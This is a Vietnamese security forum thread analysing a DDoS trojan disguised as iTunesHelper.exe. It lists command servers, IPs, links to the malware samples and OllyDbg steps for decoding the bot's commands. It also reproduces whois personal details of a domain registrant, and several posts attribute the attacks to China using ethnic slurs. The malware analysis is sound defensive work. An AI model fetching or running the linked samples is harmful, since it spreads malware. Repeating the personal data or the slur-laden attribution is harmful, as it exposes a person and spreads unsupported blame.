chắc đây là mẫu mới của đám Malware Sinh tử lệnh, TQN cần file gì để mình gửi dùng tcpview bắt được . chuyển qua proxy thì thấy liên tục gửi request đến địa chỉ vietnamnet Địa chỉ download file ituneshelp http://www.mediafire.com/?my3ge2sqvnlno76 13:20 pm , sau khi post bài này đã ngưng gửi request tới Vietnamnet , thêm vào đó thấy được mấy địa chỉ lạ http://daily.leteaks.com/index.txt? http://wide.ircop.cn/index.txt? http://pref.firebay.cn/index.txt? http://link.susaks.com/index.txt?  
Ha ha, hoan hô 1visao =D) Cái này là đích thị con nai vàng tấn công vietnamnet rồi. Sẽ cập nhật thêm thông tin. Các bạn CMC có bị đám bot tấn công không? Có IP (cho leased line) nào là 183.91.14.15 và 183.91.14.15 của CMCTI.vn đang sử dụng mà bị đập không? Thêm: Hoá ra 183.91.14.15 thuộc infrastructure của CMCTI.vn và IP này dùng để host tuanvietnam.vietnamnet.vn. Còn 183.91.14.11 thì host vef.vn. Ngoài ra, vietnamnet.vn bị đánh vào 2 IP khác nhau (2 A records: 123.30.133.166 và 117.103.197.249). Còn vietnamweek.net host ở bên Mỹ (209.160.52.52) cũng chịu chung số phận. Botnet này đánh vô tất cả các sites quan trọng của vietnamnet. Cập nhật: Tất cả zombies của botnet này hiện trỏ về master ở 200.74.244.198. IP này thuộc Panama. Nếu cần chặn, vncert có thể phối hợp các ISP để chặn ngay trên ISP level. Hiện giờ chỉ có mỗi Kaspersky nhận diện con trojan này là: Trojan.Win32.Diple.acxu. PS: sẵn tiện thông báo luôn cho công luận biết là nhóm thành viên HVA lộ diện trong việc phân tích và truy tìm malware của stl thường xuyên bị đe doạ bằng nhiều cách khác nhau. Hành vi phạm pháp và vô đạo đức bằng kỹ thuật nay bắt đầu chuyển sang hướng đe doạ. Xin thông báo để bà con rõ mức độ tồi tệ của sự việc.]]>
/hvaonline/posts/list/39641.html#245825 /hvaonline/posts/list/39641.html#245825 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245830 /hvaonline/posts/list/39641.html#245830 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://daily.leteaks.com/index.txt? http://wide.ircop.cn/index.txt? http://pref.firebay.cn/index.txt? http://link.susaks.com/index.txt? 4 cái domain này dns vào afraid.org và sitelutions.com như mấy con domain trước của STL 3 em đều trong tình trạng clientTransferProhibited riêng em firebay.cn thì có chút info
Domain Name: firebay.cn ROID: 20080211s10001s67686910-cn Domain Status: ok Registrant ID: ct2vkafo9jfsvst Registrant Organization: 许士鎏 ( Liu, Xu Shi ) Registrant Name: 许士鎏 ( Liu, Xu Shi ) Registrant Email: stan@canadaad.com Sponsoring Registrar: 北京新网互联科技有限公司 ( Beijing Innovative Linkage Technology Co., Ltd. ) Name Server:ns1.dns.com.cn Name Server:ns2.dns.com.cn Name Server:ns2.afraid.org Name Server:ns1.afraid.org Registration Date: 2008-02-11 11:39:41 Expiration Date: 2012-02-11 11:39:41 Dnssec Deployment: N  
]]>
/hvaonline/posts/list/39641.html#245831 /hvaonline/posts/list/39641.html#245831 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Registrant: SHILIU XU @mocis.com +1.4167321430 MOCIS INC. SUITE 507, 45 GRENOBLE DR. NORTH YORK,ONTARIO,CA M3C 1C4 Domain Name:canadaad.com Record last updated at 2010-11-01 12:45:14 Record created on 2002/1/17 Record expired on 2012/1/17 Domain servers in listed order: ns1.dns-diy.net ns2.dns-diy.net Billing Contactor: name: SHILIU XU mail: @mocis.com tel: +1.4167321430 org: MOCIS INC. address: SUITE 507, 45 GRENOBLE DR. city: NORTH YORK ,province: ONTARIO ,country: CA postcode: M3C 1C4   whois nốt mocis.com
Registrant: shiliu xu @public.guangzhou.gd.cn +1.4167321430 MOCIS INC. SUITE 507, 45 GRENOBLE DR. TORONTO,ONTARIO,CA M3C 1C4 Domain Name:mocis.com Record last updated at 2011-05-27 15:17:06 Record created on 2004/7/9 Record expired on 2012/7/9  
]]>
/hvaonline/posts/list/39641.html#245832 /hvaonline/posts/list/39641.html#245832 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245839 /hvaonline/posts/list/39641.html#245839 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245841 /hvaonline/posts/list/39641.html#245841 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

1visao wrote:
chắc đây là mẫu mới của đám Malware Sinh tử lệnh, TQN cần file gì để mình gửi dùng tcpview bắt được . chuyển qua proxy thì thấy liên tục gửi request đến địa chỉ vietnamnet Địa chỉ download file ituneshelp http://www.mediafire.com/?my3ge2sqvnlno76 13:20 pm , sau khi post bài này đã ngưng gửi request tới Vietnamnet , thêm vào đó thấy được mấy địa chỉ lạ http://daily.leteaks.com/index.txt? http://wide.ircop.cn/index.txt? http://pref.firebay.cn/index.txt? http://link.susaks.com/index.txt?  
Ha ha, hoan hô 1visao =D) Cái này là đích thị con nai vàng tấn công vietnamnet rồi. Sẽ cập nhật thêm thông tin. Các bạn CMC có bị đám bot tấn công không? Có IP (cho leased line) nào là 183.91.14.15 và 183.91.14.15 của CMCTI.vn đang sử dụng mà bị đập không? Thêm: Hoá ra 183.91.14.15 thuộc infrastructure của CMCTI.vn và IP này dùng để host tuanvietnam.vietnamnet.vn. Còn 183.91.14.11 thì host vef.vn. Ngoài ra, vietnamnet.vn bị đánh vào 2 IP khác nhau (2 A records: 123.30.133.166 và 117.103.197.249). Còn vietnamweek.net host ở bên Mỹ (209.160.52.52) cũng chịu chung số phận. Botnet này đánh vô tất cả các sites quan trọng của vietnamnet. Cập nhật: Tất cả zombies của botnet này hiện trỏ về master ở 200.74.244.198. IP này thuộc Panama. Nếu cần chặn, vncert có thể phối hợp các ISP để chặn ngay trên ISP level. Hiện giờ chỉ có mỗi Kaspersky nhận diện con trojan này là: Trojan.Win32.Diple.acxu. PS: sẵn tiện thông báo luôn cho công luận biết là nhóm thành viên HVA lộ diện trong việc phân tích và truy tìm malware của stl thường xuyên bị đe doạ bằng nhiều cách khác nhau. Hành vi phạm pháp và vô đạo đức bằng kỹ thuật nay bắt đầu chuyển sang hướng đe doạ. Xin thông báo để bà con rõ mức độ tồi tệ của sự việc
Khi unrar con iTunes.rar ta có 4 files: data.mdf iTunesHelper-tray.exe iTunesHelper.exe ITUNESHELPER.EXE-2BE8106E.pf Thì thưc ra file data.mdf mới bị detect là 1 Trojan. Avira cũng đã detect nó là Trojan TR/Diple.acju Nhưng tôi lại nghi thành phần chính của DDoS tool là file iTunesHelper.exe cơ! Đang thử nghiệm thưc tế. ]]>
/hvaonline/posts/list/39641.html#245842 /hvaonline/posts/list/39641.html#245842 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245845 /hvaonline/posts/list/39641.html#245845 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 wrote:
Em vừa submit file ituneshelper.exe lên web của: Symantec, McAfee, Nod32, Microsoft, Avast, AVG, Bitdefender. Em tự hỏi chúng ta có nên liên lạc với danlambaovn nhờ họ thông báo rộng rãi cho đọc giả giúp submit các file nhiễm trojan STL lên các website của các chương trình antivirus không? 
Ta nên kiểm tra kỹ hơn và cũng nên kiểm tra trong thưc tế, khi có kết quả chính xác thì thông báo cũng kịp]]>
/hvaonline/posts/list/39641.html#245846 /hvaonline/posts/list/39641.html#245846 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245848 /hvaonline/posts/list/39641.html#245848 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245853 /hvaonline/posts/list/39641.html#245853 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
Mình đang vào HVA không mở thêm 1 tab nào khác .
]]>
/hvaonline/posts/list/39641.html#245857 /hvaonline/posts/list/39641.html#245857 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245863 /hvaonline/posts/list/39641.html#245863 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Thằng coder của con fake ITunes này là coder C++, chỉ quen dùng C++ ATL/MFC string, trong khi toàn bộ source của libcurl là pure C. 
em không biết nó vô ý hay cố tình chứ em thấy code lần này khó đọc vãi ... ;)) ]]>
/hvaonline/posts/list/39641.html#245864 /hvaonline/posts/list/39641.html#245864 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. iTunesHelper.exeDDoS tool của STL. Nó tấn công khá nhanh và khá manh, liên tục vào 7 IP, đều là của vietnamnet.vn. Nghĩa là nó tấn công toàn bộ kết cấu hạ tầng của vietnamnet.vn, từ các webserver đến các Route. Kinh khủng và liều mạng. Mấy cậu nhóc VN thì đâu có kiến thức về kết cấu hạ tầng mạng để có thể tấn công như vậy. Các bác VN nhiều tuổi, giỏi và có kinh nghiệm về IT Network thì có cho kẹo cũng không dám làm, vì vietnamnet.vn là tờ báo mạng lớn và quan trọng của nhà nước, động vào là rất phiền. Chỉ có các bác Khựa ngang ngược, ỷ thế nước lớn, coi VN không ra gì, mới làm như vậy. Báo cao khảo sát thưc tế đã xong, đang hoàn tất thêm chút ít (chủ yếu là xem lai kết cấu hạ tầng mạng của vietnamnet.vn) và sẽ post lên. ]]> /hvaonline/posts/list/39641.html#245866 /hvaonline/posts/list/39641.html#245866 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245868 /hvaonline/posts/list/39641.html#245868 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245870 /hvaonline/posts/list/39641.html#245870 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245873 /hvaonline/posts/list/39641.html#245873 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Thằng coder của con fake ITunes này là coder C++, chỉ quen dùng C++ ATL/MFC string, trong khi toàn bộ source của libcurl là pure C. Avira đã có trả lời, mới up hồi chiều, nhanh thật: http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=809945 Bạn 1visao vui lòng up giùm file Autoruns của bạn, vì chắc chắn trên máy bạn còn 1 thằng nằm vùng khác download ituneshelper.exe về. File data.mdf cũng chính là ituneshelper.exe nhưng có version cũ hơn. Tức là lúc đầu con nằm vùng đó download ituneshelper.exe ver cũ về, sau đó một thời gian, nó kết nối tới đâu đó, thấy có lệnh cập nhật, nó down ituneshelper.exe mới về, kill process ituneshelper.exe cũ, rename, copy ituneshelper.exe mới vào thư mục ban đầu rồi run, đăng ký autorun. Và sẽ có một website nào đó nữa ta chưa biết chứa con trojan và file ra lệnh cập nhật này. PS: Em nói đúng không mấy anh stl. RCE code mấy anh riết ngán quá rồi :-(  
Master webserver có thể là một trong 2 webserver này: www.rackspace.com IP 207.97.209.147, đặt tai Mesa, AZ, United States host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?) Hiện nay chưa có thời gian check để xác định cụ thể là webserver nào? Vừa qua cũng chưa thấy có kết nôi download file từ webserver đến máy nạn nhân (client). Riêng việc các bác "16 chữ vàng" đặt và vận hành được webserver ở tận Panama thì quả thật em phải ngả mũ cúi chào. Chỉ có nước các bác lắm tiền, nhiều quân thì mới đủ sức đầu tư đến tận châu Phi, châu Mỹ Latinh. Chắc nước VN chúng em thì chịu. ]]>
/hvaonline/posts/list/39641.html#245874 /hvaonline/posts/list/39641.html#245874 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

vnchampion wrote:
Chào các bác ! :( Trời ạ, Hôm nay em mới seach từ Khoá Unikey nethoabinh Hiện tại trang web nethoabinh.com là trang web của em :) Thực sự em đọc topic này mà rùng rợn người. Từ trước tới nay em cài bao nhiêu phần mêm viruts quét rùi mà file unikey em tải lên là File sạch Giờ lại thấy các bác báo cáo thế, Em lại update và quét thì quả thật có báo http://www.virustotal.com/file-scan/report.html?id=298452c3c9f0c638bea809bb8d4d890c6802272a5cc0aac7064531bbae98627e-1314287130 Em không biết một tí gì vì em load trực tiếp trên trang chủ của Unikey.org ???? Rùi update lại cho anh em dùng thôi - Giờ lại ra thế này thì em cũng chả biết phải tin vào ai bây giờ :(. Nếu đợt tấn công vừa rồi là nguyên nhân do file unikey của bên em phát tán thì em thật sự xin lỗi và Em thề là không biết một tí gì vì tin tưởng load trên trang chủ và quét các phần mềm diệt viruts rùi Em xin cảm ơn.  
Không! File Unikey của em upload lên website của em (nethoabinh.com) là file Unikey sạch mà. Anh đã kiểm tra kỹ và đã có báo cáo chi tiết trong topic này (ở các trang đầu topic). Unikey này bạn lequi download về, nghi là có virus, nhưng thưc tế là file sạch, chạy tốt. ]]>
/hvaonline/posts/list/39641.html#245875 /hvaonline/posts/list/39641.html#245875 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:

vnchampion wrote:
Chào các bác ! :( Trời ạ, Hôm nay em mới seach từ Khoá Unikey nethoabinh Hiện tại trang web nethoabinh.com là trang web của em :) Thực sự em đọc topic này mà rùng rợn người. Từ trước tới nay em cài bao nhiêu phần mêm viruts quét rùi mà file unikey em tải lên là File sạch Giờ lại thấy các bác báo cáo thế, Em lại update và quét thì quả thật có báo http://www.virustotal.com/file-scan/report.html?id=298452c3c9f0c638bea809bb8d4d890c6802272a5cc0aac7064531bbae98627e-1314287130 Em không biết một tí gì vì em load trực tiếp trên trang chủ của Unikey.org ???? Rùi update lại cho anh em dùng thôi - Giờ lại ra thế này thì em cũng chả biết phải tin vào ai bây giờ :(. Nếu đợt tấn công vừa rồi là nguyên nhân do file unikey của bên em phát tán thì em thật sự xin lỗi và Em thề là không biết một tí gì vì tin tưởng load trên trang chủ và quét các phần mềm diệt viruts rùi Em xin cảm ơn.  
Không! File Unikey của em upload lên website của em (nethoabinh.com) là file Unikey sạch mà. Anh đã kiểm tra kỹ và đã có báo cáo chi tiết trong topic này (ở các trang đầu topic). Unikey này bạn lequi download về, nghi là có virus, nhưng thưc tế là file sạch, chạy tốt.  
Dạ vâng anh nói em yên tâm hơn rùi :( Lâu lắm em mới vào lại HVA #:S nên giờ mà có mệnh hệ gì em cũng buồn lắm]]>
/hvaonline/posts/list/39641.html#245881 /hvaonline/posts/list/39641.html#245881 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:
2 trang YeuHoaBinh.com và NetHoaBinh.com có rank là 682 và 688 (theo thứ tự các website ViệtNam) trên Alexa. Và...việc tìm kiếm tới UniKey luôn đứng đầu 2 site này...chứng tỏ bà còn Việt bị nhiễm malware hơi nhiều. http://www.alexa.com/siteinfo/nethoabinh.com http://www.alexa.com/siteinfo/yeuhoabinh.com Một điều đáng ngạc nhiên là như lequi nói: Khi search google về Flash Player download thì NETHOABINH.COM đứng trong top đầu mới kinh. Tuy nhiên link tới mediafire.com đã bị delete, ai có file Flash Player này thì tốt quá. Mà cái bạn "LAM VOI" trên NETHOABINH có vẻ hâm mộ TQ quá, avatar là anh LÝ THÀNH LONG, lại còn học tiếng Trung Quốc.... @lequi: check traffic qua nettop cho các domain mà bạn đưa ra thì hầu hết là ZERO, và các domain này vừa mới được thiết lập (vào khoảng thời gian đầu tháng 7). 
Chào Bạn mình là Admin của nethoabinh.com Nay tình cờ vào xem topic này Mình xin được tích cực tham gia nếu các phần mềm của mình bị dính các phần mềm đó thì Mình sẽ gỡ sạch và tạ lội với anh em Vì thực sự mình cũng hơi chủ quan Mình xin gửi bạn 4 File flash mình update trên nethoabinh và 1 file unikey Link dơnload: http://nethoabinh.com/data/flash-nethoabinh.com.zip @ Lâm voi: là tớ , và ảnh avartar là ảnh của tớ, Chỉ là thích lý tiểu long nên học Côn thôi. Yêu lý tiểu long nhưng Ghét Khựa :). Không cùng quan điểm đâu nhé]]>
/hvaonline/posts/list/39641.html#245882 /hvaonline/posts/list/39641.html#245882 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245883 /hvaonline/posts/list/39641.html#245883 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.


Lần này hết chối nhé mấy thằng tàu khựa và mấy thằng Vietnam phản động bán nước. Bà con nên để ý kỹ cái link gạch đỏ cuối cùng, hình số 3, thằng nằm vùng sẽ download thằng trojan: http://option.drfound.net/k113.css này về vào thư mục %temp%iTunes.tmp. File này em đã nhanh tay down về và up lên mediafire + file index.txt đã giãi mã sơ bộ: http://www.mediafire.com/?acqlw6ywkcva3a8 Bây giờ em buồn ngủ rồi, ngày mai rảnh thì em sẽ code tool decode, còn lười thì post hướng dẫn debug cho nhanh. Bà con thông cảm nhé ! Với các bà con dùng OllyDbg, bà con load ituneshelper.exe vào OllyDbg, patch tại address 0040D5EA từ push 60000 thành push 0 (chứ không thì nó "ngủ" đến 1 phút lận). Sau đó đặt breakpoint tại: 0040D812, rồi Run (F9) Khi OllyDbg break, quan sát nội dung memory mà thanh ghi ECX trỏ đến là ta có mệnh lệnh DDOS Vietnamnet đã được giãi mã:
Có được rồi thì terminate OllyDbg liền, đừng run gì nữa.]]>
/hvaonline/posts/list/39641.html#245885 /hvaonline/posts/list/39641.html#245885 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mediafire.com/?bdybn6hsyvm9vci link gốc Code:
http://thesmartsignature.com/cgi-bin/updater-cgi?7LmQrC8pRrqF6iRQGJtYlQF9eW%2FIL8EMYLxfycFpK3nzZejuR6l3rSYOmNp3RABmOEdHGWZEv9IjSwi5D%2Fm5EWToI2ZwfDx7Ingr1BiyQmqJLdOxrPlLL1Br6Iwdw9xnyaCTblidOq1ZzxL78NmglKgnEBmxqeoNyz5E2dxubSMEi3p2B1Hh7oMvhe8%2BGbwtMhjGli%2FZymYjcWN7ZhZDLSMbJSDJp8DG1bGBldUgct5JJ%2BJPnFgdGmYV5EVexygoe2Sd2AhezpM%3D
]]>
/hvaonline/posts/list/39641.html#245887 /hvaonline/posts/list/39641.html#245887 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
94.242.203.16 ở LUXEMBOURG option.drfound.net với mx2.thesmartsignature.com là 1 nhân tiện các bác phân tích giúp em thằng này, em download ở thesmartsignature.com về http://www.mediafire.com/?bdybn6hsyvm9vci link gốc Code:
http://thesmartsignature.com/cgi-bin/updater-cgi?7LmQrC8pRrqF6iRQGJtYlQF9eW%2FIL8EMYLxfycFpK3nzZejuR6l3rSYOmNp3RABmOEdHGWZEv9IjSwi5D%2Fm5EWToI2ZwfDx7Ingr1BiyQmqJLdOxrPlLL1Br6Iwdw9xnyaCTblidOq1ZzxL78NmglKgnEBmxqeoNyz5E2dxubSMEi3p2B1Hh7oMvhe8%2BGbwtMhjGli%2FZymYjcWN7ZhZDLSMbJSDJp8DG1bGBldUgct5JJ%2BJPnFgdGmYV5EVexygoe2Sd2AhezpM%3D
 
Mình xem qua, bạn này là file sạch bạn ah.]]>
/hvaonline/posts/list/39641.html#245889 /hvaonline/posts/list/39641.html#245889 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
PS: Chà, bà con thức khuya theo dõi dữ ha. Thôi đi ngủ đi bà con, gần hạ màn rồi, giờ chỉ là up các file .exe và thằng exe mạo danh k113.css (Giống cảnh sát 113 quá ha) này lên cho các AVs nhai xương, và report bad links, bad site các cái website sau cho nó đi die luôn cho rồi: Code:
http://wide.ircop.cn
 http://pref.firebay.cn
 http://daily.leteaks.com
 http://link.susaks.com
 http://option.drfound.net
Chúc bà con ngủ ngon, cuối cùng anh em HVA ta đã đi gần tới đích sau mấy tháng trời căng thẳng, mệt mỏi với tụi "sống chết theo lệnh", "sờ ti lợn", "ét ti eo" này -:|- ]]>
/hvaonline/posts/list/39641.html#245892 /hvaonline/posts/list/39641.html#245892 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245893 /hvaonline/posts/list/39641.html#245893 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

learningandlearning wrote:
Em đã thông báo cho Mediafire về file Unikey trên: http://nethoabinh.com/showthread.php?t=315 Giờ file này đã được xoá :)
 
Trả trách mình check file đã bị xoá :) không hiểu lý do vì sao. Hôm nay mà không đọc topic này có lẽ mình lại update lên tiếp tục đó. Nếu lần sau bạn có gì cứ PM cho mình nhé, vì mình có trách nhiệm là sửa lại các nội dung Với lại mình không cố ý và không biết là có phải có của STL hay không. :) Hiện nay các phiên bản trên nethoabinh mình đã update lại phiên bản của trên trang chủ Unikey.org Sẽ tiếp tục xoá các hót khác và update lên phiên bản chuẩn của unikey.org]]>
/hvaonline/posts/list/39641.html#245894 /hvaonline/posts/list/39641.html#245894 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mrquytk93 wrote:
Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH  
Có vẻ hơi kiêu ngạo ? Thường thì đứng trước đám đông, người ta phải biết mình là ai và phải biết phép "lịch sự" bạn nhé :| 1) Trước khi bạn "bắt" HVA phải nghiên cứ sâu hơn về synflood, vậy bạn thử phân tích qua về nó xem nào ? Nếu bạn hiểu về nó thì trong quá trình phân tích cũng tìm ra 1 số biện pháp đấy ;-) 2) Theo bạn thì "với synflood bạn có thể cho HVA die kiểu gì và đi đến đâu" ? Chắc bạn hiểu synflood lắm nhỉ ? Vậy chắc bạn biết rõ "synflood đưa HVA về đâu" ...]]>
/hvaonline/posts/list/39641.html#245899 /hvaonline/posts/list/39641.html#245899 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245900 /hvaonline/posts/list/39641.html#245900 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Hello 1visao, Nhờ 1visao tìm trên máy xem có cái "WS2_32.dll" không? Nếu có vui lòng upload lên giúp luôn nha? Cám ơn. 
Đây là file anh conmale cần. http://www.mediafire.com/?qiki732uson224n 2 bolzano_1989, TQN , đây là kết quả log Autoruns, Autorunsc , scan lúc 7:30AM sáng nay. http://www.mediafire.com/?uk4q4g8e50ms208 Con malware này không chỉ DDos vào trang index của vietnamnet , mà còn DDos sâu vào thư mục chứa các bài viết, đúng với phân tích của anh conmale về con malware Ddos vào hva.
]]>
/hvaonline/posts/list/39641.html#245901 /hvaonline/posts/list/39641.html#245901 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mrquytk93 wrote:
Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH  
Nếu HVA không có biện pháp chống thì giờ này bồ còn vô đây để tham gia được hay sao? :-) . Bồ có biết stl bot là gì không? Nếu chưa biết thì đọc từ đầu đến cuối chủ đề này để tìm hiểu. HVA không phải là chỗ để khệnh khạng "nhá hàng" bồ à. Nếu bồ có có thể cho HVA die bất cứ khi nào thì việc gì phải đợi tới đầu tháng 9?]]>
/hvaonline/posts/list/39641.html#245902 /hvaonline/posts/list/39641.html#245902 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mrquytk93 wrote:
Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH  
Bồ này sinh năm 93 mà ghê ghớm nhỉ!!!!!!!!!!Bái phục bái phục :-) đúng là "Trường Giang sóng sau đạp sóng trước"]]>
/hvaonline/posts/list/39641.html#245904 /hvaonline/posts/list/39641.html#245904 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245908 /hvaonline/posts/list/39641.html#245908 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

1visao wrote:

conmale wrote:
Hello 1visao, Nhờ 1visao tìm trên máy xem có cái "WS2_32.dll" không? Nếu có vui lòng upload lên giúp luôn nha? Cám ơn. 
Đây là file anh conmale cần. http://www.mediafire.com/?qiki732uson224n 2 bolzano_1989, TQN , đây là kết quả log Autoruns, Autorunsc , scan lúc 7:30AM sáng nay. http://www.mediafire.com/?uk4q4g8e50ms208 Con malware này không chỉ DDos vào trang index của vietnamnet , mà còn DDos sâu vào thư mục chứa các bài viết, đúng với phân tích của anh conmale về con malware Ddos vào hva.
 
Hì hì, hôm bữa anh có nhận được một nhúm packets trên hệ thống của vietnamnet, lúc đó chưa phát hiện ra con trojan, nhưng nhìn qua cái pattern trên đống packets là biết ngay đúng là đồ của stl, không chạy vào đâu được. Cái ws2_32.dll của em sạch. Anh chỉ hơi nghi ngờ. Cái log của em có hai thứ đáng ngờ: AStorDataMgrSvc.exe không có MD5 sum report. iastordatamgrsvc.exe khai báo là phiên bản 10.0.0.1046 nhưng MD5 lại không trùng với giá trị trong database chính thức. PS: Rất tiếc rằng việc "đe doạ" dù chưa được xác định cụ thể những lời "đe doạ" ấy có thật sự đi từ những người có thẩm quyền "đe doạ" hay không hay chỉ là những kẻ "tát nước theo mưa" nhưng những lời đe doạ ấy đã tạo không ít ảnh hưởng đến tâm lý của người tham gia. Những ai đã "đe doạ" xin nhớ rằng, sự thật khó mà che đậy được nếu như nó đã mở rộng ra trước công luận.]]>
/hvaonline/posts/list/39641.html#245910 /hvaonline/posts/list/39641.html#245910 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245911 /hvaonline/posts/list/39641.html#245911 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Cái log của em có hai thứ đáng ngờ: AStorDataMgrSvc.exe không có MD5 sum report. iastordatamgrsvc.exe khai báo là phiên bản 10.0.0.1046 nhưng MD5 lại không trùng với giá trị trong database chính thức.   Đây là file anh conmale , TQN cần . http://www.mediafire.com/?2fck84b2ks5eonu]]> /hvaonline/posts/list/39641.html#245913 /hvaonline/posts/list/39641.html#245913 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

1visao wrote:

conmale wrote:
Hello 1visao, Nhờ 1visao tìm trên máy xem có cái "WS2_32.dll" không? Nếu có vui lòng upload lên giúp luôn nha? Cám ơn. 
Đây là file anh conmale cần. http://www.mediafire.com/?qiki732uson224n 2 bolzano_1989, TQN , đây là kết quả log Autoruns, Autorunsc , scan lúc 7:30AM sáng nay. http://www.mediafire.com/?uk4q4g8e50ms208 Con malware này không chỉ DDos vào trang index của vietnamnet , mà còn DDos sâu vào thư mục chứa các bài viết, đúng với phân tích của anh conmale về con malware Ddos vào hva.  
Trước hết cám ơn 1visao vì đã tìm ra và cung cấp cho HVA file nghi vấn iTunes.rar. Tuy nhiên trong file này khi extract ra thì có 4 file và (lúc đó) chỉ có 1 file bị Avira và KIS phat hiện là vírus, là file data.mdf, còn file iTunesHelper.exe thì KIS và Avira đều không detect được nó là một Trojan, nhưng tôi nghi nó chính là DDoS tool của STL tấn công vào vietnamnet.vn (như tôi đã viết ở bài viết trên) Hôm nay 26-8-2011 thì Avira đã detect được file iTunesHelper.exe là virus, tên là "TR/Diple.acxu" (hôm trước thì Avira gọi Trojan nhúng trong data.mdf là TR/Diple.acju- tên hơi khác phần đuôi). Đây là phản hồi rất tích cưc của Avira, sau khi anh TQN submit mẫu file iTunesHelper.exe đến Avira (vào chiều hôm qua) Trong bài viết của em trên đây, nhóm từ Con malware này, thì ý em ám chỉ con trojan nào? Có phải là chính iTunesHelper.exe không? ]]>
/hvaonline/posts/list/39641.html#245914 /hvaonline/posts/list/39641.html#245914 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245916 /hvaonline/posts/list/39641.html#245916 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245921 /hvaonline/posts/list/39641.html#245921 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. 2 1visao: Lại hình như là của stl rồi 1visao. Làm sao mà tụi nó mạo danh nguyên một gói phần mềm của Intel được ???? File của Intel mắc mớ gì lại dùng thư viện CryptoPP làm chi. Cậu up giùm tui các file .dll sau: 1. IAStorCommon.dll 2. IAStorUIHelper.dll 3. IAStorDataMgr.dll 4. SmartPin.dll 5. SysInftLib.dll   Đây là File của TQN yêu cầu http://www.mediafire.com/?s0h22uffbdu1o24]]> /hvaonline/posts/list/39641.html#245923 /hvaonline/posts/list/39641.html#245923 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
